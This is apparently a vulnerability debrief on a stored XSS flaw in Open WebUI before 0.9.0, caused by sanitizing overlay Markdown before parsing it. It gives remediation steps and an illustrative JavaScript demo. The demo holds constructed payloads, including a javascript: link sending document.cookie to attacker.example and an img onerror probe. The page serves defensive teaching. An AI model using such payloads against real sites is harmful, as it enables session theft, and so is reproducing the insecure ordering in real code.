PatchSiren cyber security CVE debrief
CVE-2026-44568 open-webui CVE debrief
A stored cross-site scripting (XSS) vulnerability exists in Open WebUI prior to version 0.9.0. The AccountPending.svelte component renders administrator-configured Pending User Overlay Content through marked.parse() inside Svelte's {@html} directive with DOMPurify applied in the wrong order, so an administrator can store Markdown that executes JavaScript in the browsers of pending users who view the overlay.
- Vendor: open-webui
- Product: Unknown
- CVSS: MEDIUM 4.8
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-05-15
- Original CVE updated: 2026-05-19
- Advisory published: 2026-05-15
- Advisory updated: 2026-05-19
Who should care
Organizations running self-hosted Open WebUI instances with pending user workflows; security teams monitoring for stored XSS in AI platform interfaces; administrators responsible for Open WebUI deployments
Technical summary
Open WebUI versions prior to 0.9.0 contain a stored cross-site scripting vulnerability in the AccountPending.svelte component. The component renders the administrator-configured Pending User Overlay Content by passing it through marked.parse() and into Svelte's {@html} directive, which disables Svelte's automatic HTML escaping. DOMPurify is applied in the wrong order relative to marked.parse(), so the HTML that reaches {@html} is not the HTML that was sanitized. An administrator (or an attacker holding an administrator session) can therefore store Markdown that renders to arbitrary JavaScript, and that script runs in the browser of every pending user who opens the overlay page. Exploitation requires administrator privileges (PR:H), and the victim must view the page (UI:R); the CVSS scope is changed (S:C) because the script executes in the pending user's browser context rather than in the component that holds the flaw. The issue is resolved in Open WebUI version 0.9.0.
Defensive priority
medium
Recommended defensive actions
- Upgrade Open WebUI to version 0.9.0 or later to remediate this vulnerability
- Review and sanitize any existing Pending User Overlay Content configured by administrators
- Audit administrator accounts for potential compromise if untrusted content was previously configured
- Deploy a Content Security Policy (CSP) for the Open WebUI front end as a defense-in-depth measure; test the policy against the application first, since a policy strict enough to block injected inline script may need tuning for the front end's own assets
- Monitor administrator-side changes to the Pending User Overlay Content setting, since the attack path is an administrator account (legitimate or compromised) writing the content; script execution inside pending users' browsers is not something the server can observe directly
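The following is an added example, not code from Open WebUI and not the marked or DOMPurify libraries. Two small stand-ins for marked.parse() and DOMPurify.sanitize() make the ordering problem from the technical summary runnable offline, and a small audit helper supports the "review existing overlay content" action above. The payloads are constructed for illustration; the exact content that triggered the real issue is not on the page, so the payload shape and the helper names are assumptions.

```javascript
// Added example (not Open WebUI's code, not marked or DOMPurify). The stand-ins
// below mimic the relevant behaviour of marked.parse() and DOMPurify.sanitize()
// so the ordering bug can be demonstrated offline. Payloads are constructed.

// Stand-in for marked.parse(): turns [text](url) into a link and, like real
// Markdown renderers, passes raw HTML through untouched.
function toyMarkdownToHtml(md) {
  return md.replace(
    /\[([^\]]*)\]\(([^)\s]*)\)/g,
    (_match, text, href) => `<a href="${href}">${text}</a>`,
  );
}

const ALLOWED_TAGS = new Set(["a", "b", "i", "em", "strong", "p", "br"]);
const ALLOWED_ATTRS = new Set(["href"]);

// Reject href values whose scheme can execute script (javascript:, data:, ...).
// Control characters and whitespace are stripped first, as browsers do.
function isSafeHref(value) {
  const v = value.replace(/[\u0000-\u0020]/g, "").toLowerCase();
  if (!/^[a-z][a-z0-9+.-]*:/.test(v)) return true; // relative URL, no scheme
  return v.startsWith("http:") || v.startsWith("https:") || v.startsWith("mailto:");
}

// Stand-in for DOMPurify.sanitize(): tag and attribute allowlist, no event
// handlers, no script-capable URL schemes. It works on HTML, which is exactly
// why it must run AFTER the Markdown renderer, never before it.
function toySanitize(html) {
  const noScripts = html.replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, "");
  return noScripts.replace(/<(\/?)([a-zA-Z][\w-]*)([^>]*)>/g, (_whole, slash, name, attrs) => {
    const tag = name.toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) return "";
    if (slash) return `</${tag}>`;
    let kept = "";
    const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
    for (let m = attrRe.exec(attrs); m !== null; m = attrRe.exec(attrs)) {
      const attrName = m[1].toLowerCase();
      const attrValue = m[2] ?? m[3] ?? m[4] ?? "";
      if (!ALLOWED_ATTRS.has(attrName)) continue; // drops onerror, onclick, ...
      if (attrName === "href" && !isSafeHref(attrValue)) continue;
      kept += ` ${attrName}="${attrValue.replace(/"/g, "&quot;")}"`;
    }
    return `<${tag}${kept}>`;
  });
}

// Wrong order, the pattern the advisory describes: the sanitizer sees only the
// Markdown source, then the renderer creates fresh HTML that nothing inspects
// before it reaches {@html}.
function renderSanitizeThenParse(markdown) {
  return toyMarkdownToHtml(toySanitize(markdown));
}

// Correct order: render first, then sanitize the HTML that actually reaches {@html}.
function renderParseThenSanitize(markdown) {
  return toySanitize(toyMarkdownToHtml(markdown));
}

// Audit helper for already-stored overlay content: true when sanitizing the
// rendered HTML would change it, i.e. the content deserves a human look.
function overlayContentNeedsReview(markdown) {
  const html = toyMarkdownToHtml(markdown);
  return toySanitize(html) !== html;
}

// Constructed payloads; attacker.example is a placeholder host.
const LINK_PAYLOAD =
  "Your account is pending approval. " +
  "[Click to continue](javascript:location='https://attacker.example/?c='+document.cookie)";
const RAW_HTML_PAYLOAD = "Your account is pending approval. <img src=x onerror=alert(1)>";
const BENIGN_CONTENT = "Your account is pending approval. [Contact us](mailto:admin@example.com)";

console.log(renderSanitizeThenParse(LINK_PAYLOAD));    // javascript: href survives
console.log(renderParseThenSanitize(LINK_PAYLOAD));    // ... <a>Click to continue</a>
console.log(renderSanitizeThenParse(RAW_HTML_PAYLOAD)); // raw HTML is caught in either order
console.log(overlayContentNeedsReview(LINK_PAYLOAD), overlayContentNeedsReview(BENIGN_CONTENT)); // true false
```

The raw-HTML payload is the instructive part: a sanitizer run before the renderer does strip an obvious `<img onerror>` probe, which is why a sanitize-then-parse pipeline can pass casual testing. Markdown link syntax carries no HTML for the pre-parse sanitizer to act on, and the renderer then emits the `javascript:` anchor unchecked. With the real libraries the parse-then-sanitize order is `DOMPurify.sanitize(marked.parse(content))` before the value is handed to `{@html}`; that is the general rule, not a quotation of the 0.9.0 patch.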
Evidence notes
The vulnerability stems from improper sanitization order when processing the Pending User Overlay Content: the output of marked.parse() is rendered with {@html} in Svelte, but DOMPurify is applied in the wrong order relative to that parse step, so Markdown-generated HTML reaches the DOM unsanitized and JavaScript injection is possible. The CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N indicates network attack vector, low attack complexity, high privileges required, user interaction required, changed scope, low confidentiality and integrity impact, and no availability impact. CWE-79 (Improper Neutralization of Input During Web Page Generation) is identified as the weakness type.
Official resources
- CVE-2026-44568 CVE record (CVE.org)
- CVE-2026-44568 NVD detail (NVD)
- Source item URL: nvd_modified
- Mitigation or vendor reference: [email protected] (Exploit, Mitigation, Vendor Advisory), 2026-05-15